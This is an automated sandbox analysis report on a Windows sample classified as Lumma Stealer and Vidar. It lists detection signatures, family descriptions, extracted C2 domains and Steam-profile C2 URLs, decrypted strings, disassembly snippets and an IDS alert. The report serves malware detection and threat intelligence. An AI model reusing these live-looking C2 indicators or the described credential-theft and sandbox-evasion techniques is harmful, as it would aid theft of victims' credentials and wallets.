Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1524997
MD5: c9784db0c88a05a8aae9ddb7289b51db
SHA1: 7ce51feb0e818f5acb6ba4f1deb9f4fef04d7cd6
SHA256: fa8e8dfb272f18daaece8b6ac3f9d6b16f9484764aff1005c9096909d75f760d
Tags: exe, user-Bitsight

Detection

LummaC, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: https://steamcommunity.com/profiles/76561199724331900 URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ URL Reputation: Label: malware
Source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "433cd71b7a2bdd3668a493b00ee95630"}
Source: 16.2.MSBuild.exe.400000.0.raw.unpack Malware Configuration Extractor: LummaC {"C2 url": ["treatynreit.site", "questionsmw.stor", "mysterisop.site", "soldiefieop.site", "abnomalrkmu.site", "absorptioniw.site", "snarlypagowo.site", "chorusarorp.site"], "Build id": "H8NgCl--"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\CBFCFBFBFB.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: absorptioniw.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: mysterisop.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: snarlypagowo.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: treatynreit.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: chorusarorp.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: abnomalrkmu.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: soldiefieop.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: questionsmw.stor
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: - Screen Resoluton:
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: - Physical Installed Memory:
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: Workgroup: -
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp String decryptor: H8NgCl--
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree, 4_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 4_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 4_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA, 4_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C896C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 4_2_6C896C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C9EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 4_2_6C9EA9A0
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:56263 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.166.76:443 -> 192.168.2.8:56266 version: TLS 1.2
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2221135617.000000003823A000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2215082591.000000002C352000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source: Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0062735B FindFirstFileExW, 0_2_0062735B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 4_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 4_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 4_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 4_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 4_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 4_2_0040CD37
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 13_2_00B0735B FindFirstFileExW, 13_2_00B0735B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 4_2_00415142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 0_2_00639385
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 0_2_00639385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 4_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 4_2_004014AD
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [edi], al 13_2_00B4A08D
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then movzx esi, byte ptr [edx+eax-01h] 13_2_00B240E8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then movzx edx, word ptr [esp+eax*4+000000ACh] 13_2_00B240E8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [edi], al 13_2_00B4A004
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+20h] 13_2_00B2E1F1
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 13_2_00B2C16C
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov word ptr [edx], ax 13_2_00B42158
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [edi], al 13_2_00B4A3E0
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [edi], al 13_2_00B4A3D9
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then movzx ecx, word ptr [edi] 13_2_00B424F8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 13_2_00B2E448
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov ebx, eax 13_2_00B22558
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov ebp, eax 13_2_00B22558
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp al, 2Eh 13_2_00B446B7
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+14h] 13_2_00B426A8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then jmp eax 13_2_00B42778
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp] 13_2_00B449E3
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 13_2_00B5EABD
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 13_2_00B1CA28
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [edi], al 13_2_00B4AA72
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 13_2_00B5EB32
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 13_2_00B5CB68
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then jmp dword ptr [00451A70h] 13_2_00B46C40
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 13_2_00B38C49
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esi+08h] 13_2_00B2AD3A
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp] 13_2_00B46D18
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then movzx eax, byte ptr [ebx+edx-06h] 13_2_00B1ED08
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then movzx esi, byte ptr [edx+ebp] 13_2_00B1ED08
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 13_2_00B32ED8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 13_2_00B3EEC8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+24h] 13_2_00B44E06
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esi+00000080h] 13_2_00B2AE05
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [edi], al 13_2_00B4AE60
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [edi], al 13_2_00B4AE60
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [ebx], al 13_2_00B4AE60
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [edi], al 13_2_00B4AE60
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov word ptr [eax], dx 13_2_00B38FA8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov esi, ebx 13_2_00B60F90
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h 13_2_00B370AE
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [ebx], al 13_2_00B2B034
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp] 13_2_00B41018
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 13_2_00B5D063
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov dword ptr [esp+34h], edx 13_2_00B191CA
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov word ptr [eax], cx 13_2_00B3F128
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov word ptr [eax], cx 13_2_00B3F128
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+00000688h] 13_2_00B352C4
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then dec ebx 13_2_00B572C8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 13_2_00B2D225
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 13_2_00B2D215
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov dword ptr [esp+08h], ecx 13_2_00B1925D
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], D518DBA1h 13_2_00B573B8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], D1A85EEEh 13_2_00B573B8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp] 13_2_00B453BA
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov dword ptr [esp+18h], 3602043Ah 13_2_00B473A0
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov dword ptr [esp+50h], 00000000h 13_2_00B2D394
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov word ptr [eax], dx 13_2_00B393D1
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh 13_2_00B5F508
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 13_2_00B59578
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+68h] 13_2_00B5F6F8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+000000D0h] 13_2_00B3560A
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [ebp-000000C0h] 13_2_00B277EF
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+24h] 13_2_00B458E2
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 13_2_00B618E8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 13_2_00B538C8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+54h] 13_2_00B37A89
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [ebx], al 13_2_00B4BAD6
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [ebx], al 13_2_00B4BAD6
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [ebx], al 13_2_00B4BAD6
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov byte ptr [ebx], al 13_2_00B4BAD6
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 13_2_00B1DAD8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 13_2_00B27AD8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 13_2_00B5BA38
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp byte ptr [ebp+ebx+00h], 00000000h 13_2_00B45A23
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 13_2_00B61A78
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then jmp dword ptr [0045042Ch] 13_2_00B37A4B
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 13_2_00B2BBF4
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h 13_2_00B61BF8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 13_2_00B61BF8
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 13_2_00B43B2E
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp eax, C0000004h 13_2_00B35CD6
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp] 13_2_00B5BC78
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then xor eax, eax 13_2_00B43DCE
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp] 13_2_00B25E98
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov eax, dword ptr [esp+10h] 13_2_00B25E98
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then jmp eax 13_2_00B2DE12
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 69F07BF2h 13_2_00B3FE00
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 13_2_00B47F88
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 64567875h 13_2_00B5BF18
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h 13_2_00B5FF78

Networking

Source: Network traffic Suricata IDS: 2056394 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (absorptioniw .site) : 192.168.2.8:50732 -> 1.1.1.1:53
